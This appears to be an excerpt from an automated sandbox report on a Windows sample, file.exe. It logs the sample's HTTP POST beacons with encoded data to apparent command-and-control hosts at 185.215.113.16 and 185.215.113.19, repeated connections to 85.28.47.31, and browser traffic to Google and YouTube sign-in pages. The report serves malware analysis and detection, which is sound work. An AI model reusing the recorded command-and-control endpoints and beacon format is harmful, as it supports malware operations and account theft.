Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 52.153.155.231 52.153.155.231
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 152.195.19.97 152.195.19.97
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76c0xx2-tCl3huF6R_uGDdkvCx33lS6VkP03GMJYqycbKU88ilI9jnwvjjmkhmcj4FKFUKtFA HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di
Source: global traffic HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q
Source: global traffic HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB2MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHu1g2JNWjQ7Rsj1KTg1Ll6LPidEQ/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
